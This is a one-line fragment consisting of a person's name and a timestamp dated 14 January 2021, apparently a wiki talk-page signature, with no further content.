Daniel Simao 23:35, 14 January 2021 (EST)